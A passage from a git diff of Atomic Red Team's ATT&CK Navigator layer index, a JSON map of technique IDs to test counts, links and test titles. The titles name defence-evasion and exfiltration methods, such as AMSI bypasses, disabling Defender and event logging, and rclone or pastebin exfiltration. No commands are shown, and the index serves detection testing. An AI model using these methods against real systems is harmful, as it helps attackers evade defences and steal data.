Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":57,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 358de0dc45..1a1abbbf59 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":50,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 